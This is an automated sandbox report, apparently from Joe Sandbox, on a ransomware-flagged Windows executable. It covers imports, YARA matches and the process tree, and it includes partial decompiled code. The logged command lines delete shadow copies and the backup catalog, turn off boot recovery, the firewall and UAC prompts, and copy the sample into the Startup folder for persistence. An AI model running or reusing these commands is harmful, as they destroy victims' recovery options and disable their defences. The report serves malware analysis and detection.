                                      RT_RCDATA0xb97180x14zlib compressed data
                                      RT_RCDATA0xb972c0x1222data
                                      RT_GROUP_ICON0xba9500x84data
                                      RT_MANIFEST0xba9d40x2a0XML 1.0 document, ASCII text, with very long lines, with no line terminators

                                      Imports

                                      DLLImport
                                      KERNEL32.DLLGetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject
                                      COMCTL32.DLLInitCommonControlsEx
                                      GDI32.DLLGetStockObject
                                      MSVCRT.dllmemset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc
                                      OLE32.DLLCoInitialize, CoTaskMemFree
                                      SHELL32.DLLShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
                                      SHLWAPI.DLLPathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW
                                      USER32.DLLCharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
                                      WINMM.DLLtimeBeginPeriod

                                      Network Behavior

                                      No network behavior found

                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: 53c0505a_by_Libranalysis.exe PID: 5884 Parent PID: 5624

                                      General

                                      Start time:17:27:09
                                      Start date:14/05/2021
                                      Path:C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe'
                                      Imagebase:0x400000
                                      File size:752128 bytes
                                      MD5 hash:53C0505AFE3B2BF43C5724B954DA464C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000000.00000002.501671078.0000000002160000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000000.00000003.232327020.00000000024A5000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.501900758.00000000022F7000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000000.00000002.501900758.00000000022F7000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.501851412.0000000002178000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000000.00000002.501851412.0000000002178000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000000.00000002.501788643.0000000002170000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000000.00000002.501788643.0000000002170000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 384 Parent PID: 5884

                                      General

                                      Start time:17:27:09
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff774ee0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 4844 Parent PID: 5884

                                      General

                                      Start time:17:27:10
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\19BE.tmp\19BF.tmp\19C0.bat C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe'
                                      Imagebase:0x7ff7bf140000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: WMIC.exe PID: 2132 Parent PID: 4844

                                      General

                                      Start time:17:27:10
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:wmic shadowcopy delete
                                      Imagebase:0x7ff7edf00000
                                      File size:521728 bytes
                                      MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: vssadmin.exe PID: 6252 Parent PID: 4844

                                      General

                                      Start time:17:27:13
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\vssadmin.exe
                                      Wow64 process (32bit):false
                                      Commandline:vssadmin delete shadows /all /quiet
                                      Imagebase:0x7ff6f5630000
                                      File size:145920 bytes
                                      MD5 hash:47D51216EF45075B5F7EAA117CC70E40
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6288 Parent PID: 4844

                                      General

                                      Start time:17:27:14
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {current} optionsedit off
                                      Imagebase:0x7ff77c2c0000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6312 Parent PID: 4844

                                      General

                                      Start time:17:27:15
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {current} advancedoptions off
                                      Imagebase:0x7ff77c2c0000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6332 Parent PID: 4844

                                      General

                                      Start time:17:27:16
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {current} bootems no
                                      Imagebase:0x7ff77c2c0000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6356 Parent PID: 4844

                                      General

                                      Start time:17:27:17
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {default} recoveryenabled no
                                      Imagebase:0x7ff77c2c0000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6428 Parent PID: 4844

                                      General

                                      Start time:17:27:17
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                      Imagebase:0x7ff77c2c0000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: WMIC.exe PID: 6496 Parent PID: 4844

                                      General

                                      Start time:17:27:18
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:wmic os get caption
                                      Imagebase:0x7ff7edf00000
                                      File size:521728 bytes
                                      MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: findstr.exe PID: 6516 Parent PID: 4844

                                      General

                                      Start time:17:27:19
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\findstr.exe
                                      Wow64 process (32bit):false
                                      Commandline:findstr /I /C:'10'
                                      Imagebase:0x7ff671100000
                                      File size:34304 bytes
                                      MD5 hash:BCC8F29B929DABF5489C9BE6587FF66D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: netsh.exe PID: 6632 Parent PID: 4844

                                      General

                                      Start time:17:27:22
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall firewall add rule name='Micorosoft Windows Update' dir=in action=allow program='C:\Users\user\Desktop\53c0505a_by_Libranalysis.exe' enable=yes
                                      Imagebase:0x7ff7d8670000
                                      File size:92672 bytes
                                      MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: 53c0505a_by_Libranalysis.exe PID: 6640 Parent PID: 3292

                                      General

                                      Start time:17:27:22
                                      Start date:14/05/2021
                                      Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe'
                                      Imagebase:0x400000
                                      File size:752128 bytes
                                      MD5 hash:53C0505AFE3B2BF43C5724B954DA464C
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000012.00000002.506883281.0000000002600000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000012.00000003.264116735.0000000002715000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000012.00000002.507012237.0000000002608000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000012.00000002.507012237.0000000002608000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000012.00000002.505668893.0000000000AF0000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000012.00000002.505668893.0000000000AF0000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Ransomware_Generic, Description: Yara detected Ransomware_Generic, Source: 00000012.00000002.505805406.0000000000B47000.00000004.00000040.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AESCRYPTTool, Description: Yara detected AESCRYPT Tool, Source: 00000012.00000002.505805406.0000000000B47000.00000004.00000040.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 47%, ReversingLabs

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 6764 Parent PID: 6640

                                      General

                                      Start time:17:27:23
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff774ee0000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: netsh.exe PID: 6796 Parent PID: 4844

                                      General

                                      Start time:17:27:25
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\netsh.exe
                                      Wow64 process (32bit):false
                                      Commandline:netsh advfirewall set currentprofile state off
                                      Imagebase:0x7ff7d8670000
                                      File size:92672 bytes
                                      MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 6856 Parent PID: 6640

                                      General

                                      Start time:17:27:25
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Windows\sysnative\cmd' /c 'C:\Users\user\AppData\Local\Temp\539A.tmp\539B.tmp\539C.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53c0505a_by_Libranalysis.exe''
                                      Imagebase:0x7ff7bf140000
                                      File size:273920 bytes
                                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: wbadmin.exe PID: 6928 Parent PID: 4844

                                      General

                                      Start time:17:27:27
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\wbadmin.exe
                                      Wow64 process (32bit):false
                                      Commandline:wbadmin.exe delete catalog -quiet
                                      Imagebase:0x7ff7b3b00000
                                      File size:281600 bytes
                                      MD5 hash:EE1E2C4D42579B19D765420E07589148
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: WMIC.exe PID: 6964 Parent PID: 6856

                                      General

                                      Start time:17:27:27
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:wmic shadowcopy delete
                                      Imagebase:0x7ff6e3690000
                                      File size:521728 bytes
                                      MD5 hash:EC80E603E0090B3AC3C1234C2BA43A0F
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: wbengine.exe PID: 7040 Parent PID: 560

                                      General

                                      Start time:17:27:28
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\wbengine.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\wbengine.exe
                                      Imagebase:0x7ff6ffb90000
                                      File size:1535488 bytes
                                      MD5 hash:6E235F75DF84C387388D23D697D6540B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: vdsldr.exe PID: 7112 Parent PID: 792

                                      General

                                      Start time:17:27:28
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\vdsldr.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\vdsldr.exe -Embedding
                                      Imagebase:0x7ff6840b0000
                                      File size:25088 bytes
                                      MD5 hash:CD0D2028997ABCA78774E062CEC4E701
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: vds.exe PID: 7148 Parent PID: 560

                                      General

                                      Start time:17:27:33
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\vds.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\vds.exe
                                      Imagebase:0x7ff610950000
                                      File size:642560 bytes
                                      MD5 hash:4940B49502323905B66039D0D1AB4613
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: vssadmin.exe PID: 7156 Parent PID: 6856

                                      General

                                      Start time:17:27:30
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\vssadmin.exe
                                      Wow64 process (32bit):false
                                      Commandline:vssadmin delete shadows /all /quiet
                                      Imagebase:0x7ff6a78e0000
                                      File size:145920 bytes
                                      MD5 hash:47D51216EF45075B5F7EAA117CC70E40
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 5040 Parent PID: 6856

                                      General

                                      Start time:17:27:31
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {current} optionsedit off
                                      Imagebase:0x7ff6dd830000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6280 Parent PID: 6856

                                      General

                                      Start time:17:27:32
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {current} advancedoptions off
                                      Imagebase:0x7ff6dd830000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 6304 Parent PID: 6856

                                      General

                                      Start time:17:27:33
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {current} bootems no
                                      Imagebase:0x7ff6dd830000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: reg.exe PID: 5112 Parent PID: 4844

                                      General

                                      Start time:17:27:34
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\reg.exe
                                      Wow64 process (32bit):false
                                      Commandline:REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f
                                      Imagebase:0x7ff7e7ce0000
                                      File size:72704 bytes
                                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: bcdedit.exe PID: 668 Parent PID: 6856

                                      General

                                      Start time:17:27:34
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\bcdedit.exe
                                      Wow64 process (32bit):false
                                      Commandline:bcdedit /set {default} recoveryenabled no
                                      Imagebase:0x7ff6dd830000
                                      File size:461824 bytes
                                      MD5 hash:6E05CD5195FDB8B6C68FC90074817293
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Analysis Process: reg.exe PID: 6392 Parent PID: 4844

                                      General

                                      Start time:17:27:35
                                      Start date:14/05/2021
                                      Path:C:\Windows\System32\reg.exe
                                      Wow64 process (32bit):false
                                      Commandline:REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f
                                      Imagebase:0x7ff7e7ce0000
                                      File size:72704 bytes
                                      MD5 hash:E3DACF0B31841FA02064B4457D44B357
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language

                                      Chronological Activities

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Analysis Process: 53c0505a_by_Libranalysis.exe PID: 5884 Parent PID: 5624 53c0505a_by_Libranalysis.exeCOMMON

                                        Executed Functions

                                        Function 0040AD76, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 82%
                                        			E0040AD76(void* __eflags, intOrPtr _a4) {
				_Unknown_base(*)()* _t9;
				signed int _t11;
				signed int _t12;
				void* _t13;
				WCHAR* _t14;
				struct HINSTANCE__* _t17;

				_t14 = E0040E8A0(0x104, _a4);
				_t12 = GetTempPathW(0x104, _t14);
				_t17 = LoadLibraryW(L"Kernel32.DLL");
				if(_t17 != 0) {
					_t9 = GetProcAddress(_t17, "GetLongPathNameW");
					if(_t9 != 0) {
						_t11 =  *_t9(_t14, _t14, 0x104); // executed
						_t12 = _t11;
					}
					FreeLibrary(_t17);
				}
				E0040E9F0(_t13, 0x104 - _t12);
				_t14[_t12] = 0;
				return 0;
			}









                                        0x0040ad89
                                        0x0040ad98
                                        0x0040ada0
                                        0x0040ada4
                                        0x0040adac
                                        0x0040adb4
                                        0x0040adb9
                                        0x0040adbb
                                        0x0040adbb
                                        0x0040adbe
                                        0x0040adbe
                                        0x0040adc7
                                        0x0040adce
                                        0x0040add6

                                        APIs
                                          • Part of subcall function 0040E8A0: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E8AC
                                          • Part of subcall function 0040E8A0: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E907
                                        • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040AD8D
                                        • LoadLibraryW.KERNEL32(Kernel32.DLL,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040AD9A
                                        • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040ADAC
                                        • GetLongPathNameW.KERNELBASE(00000000,00000000,00000104,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000), ref: 0040ADB9
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000000,00401A1E,00000000,00000000,00000400,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040ADBE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
                                        • String ID: GetLongPathNameW$Kernel32.DLL
                                        • API String ID: 1993255246-2943376620
                                        • Opcode ID: c50bc924c8015ec940b5478868f713f06b19097a89fbde149f3c6bbfbe1b325f
                                        • Instruction ID: 7b78ae9ec488b72fe7678b7566da56899adb9051f9a89254ebc4bee8e1139b44
                                        • Opcode Fuzzy Hash: c50bc924c8015ec940b5478868f713f06b19097a89fbde149f3c6bbfbe1b325f
                                        • Instruction Fuzzy Hash: 9FF0E2722442147FC3212BB6AC4CEEB3E6DDF867563004436F905E2251EA7C4C1082BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004099BF, Relevance: 73.9, APIs: 40, Strings: 2, Instructions: 395memorypipesynchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E004099BF(signed char _a4, wchar_t* _a8, signed char _a16, intOrPtr _a20) {
				wchar_t* _v0;
				struct _SHELLEXECUTEINFOW _v68;
				struct _STARTUPINFOW _v136;
				struct _SECURITY_ATTRIBUTES _v156;
				signed int _v160;
				void* _v168;
				int _v172;
				void* _v176;
				void* _v180;
				void* _v184;
				void* _v188;
				void* _v192;
				void* _v196;
				void* _v200;
				signed int _t163;
				int _t165;
				int _t174;
				long _t175;
				signed int* _t189;
				signed char _t195;
				signed int* _t205;
				intOrPtr _t250;
				intOrPtr _t251;
				signed char _t255;
				wchar_t* _t256;
				signed char _t257;
				signed char _t258;
				int _t260;
				WCHAR* _t265;
				WCHAR* _t275;
				signed int* _t276;
				int _t278;
				WCHAR* _t282;
				int _t283;
				short* _t286;
				long _t292;
				void** _t295;

				_v156.nLength = 0xc;
				_t292 = 0x20;
				_t278 = 0x44;
				_v192 = 0;
				_t276 = 0;
				_v176 = 0;
				_v168 = 0;
				_v188 = 0;
				_v180 = 0;
				_v184 = 0;
				_v172 = 0;
				_v156.lpSecurityDescriptor.hProcess = 0;
				_v156.bInheritHandle = 1;
				memset( &(_v136.lpDesktop), 0, _t278);
				_v136.lpReserved2 = 1;
				_t295 =  &(( &_v192)[3]);
				_t255 = _a16;
				_v136.lpDesktop = _t278;
				if((_t255 & 0x00000002) == 0) {
					_t260 = 1;
					_v136.hStdInput = 1;
				} else {
					_t260 = 1;
					_v136.hStdInput = 0;
					_t292 = 0x30;
				}
				if((_t255 & 0x00000040) == 0) {
					L7:
					if((_t255 & 0x00000004) == 0 || (_t255 & 0x00000010) == 0 || CreatePipe( &_v192,  &_v176,  &_v156, 0) == 0) {
						goto L12;
					} else {
						_v136.lpReserved2 = _v136.lpReserved2 | 0x00000100;
						_v136.hStdError = _v192;
						E00409967(_t260,  &_v176);
						_pop(_t260);
						_v172 = 1;
						goto L11;
					}
				} else {
					_t250 = _a20;
					if(_t250 == 0) {
						goto L7;
					}
					_t251 =  *((intOrPtr*)(_t250 + 0xc));
					if(_t251 == 0) {
						goto L7;
					} else {
						_v136.lpReserved2 = 0x101;
						_v136.hStdError = _t251;
						_v172 = _t260;
						L11:
						_t292 = _t292 & 0xffffffef;
						L12:
						_t163 = _t255 & 0x00000004;
						_v160 = _t163;
						if(_t163 != 0) {
							if((_t255 & 0x00000008) != 0 && CreatePipe( &_v168,  &_v188,  &_v156, 0) != 0) {
								_v136.lpReserved2 = _v136.lpReserved2 | 0x00000100;
								_v68.cbSize = _v188;
								E00409967(_t260,  &_v168);
								_pop(_t260);
								_t292 = _t292 & 0xffffffef;
								_v172 = 1;
							}
							if((_t255 & 0x00000020) != 0 && CreatePipe( &_v180,  &_v184,  &_v156, 0) != 0) {
								_v136.lpReserved2 = _v136.lpReserved2 | 0x00000100;
								_v68.fMask = _v184;
								E00409967(_t260,  &_v180);
								_t292 = _t292 & 0xffffffef;
								_v172 = 1;
							}
						}
						if((_v136.lpReserved2 & 0x00000100) != 0) {
							if(_v136.hStdError == _t276) {
								_v136.hStdError = GetStdHandle(0xfffffff6);
							}
							if(_v68.cbSize == _t276) {
								_v68.cbSize = GetStdHandle(0xfffffff5);
							}
							if(_v68.fMask == _t276) {
								_v68.fMask = GetStdHandle(0xfffffff4);
							}
						}
						_t256 = _a4;
						if(_t256 == 0) {
							_t256 = 0x413024;
						}
						if(_a8 == _t276) {
							_a8 = 0x413024;
						}
						_t165 = wcslen(_t256);
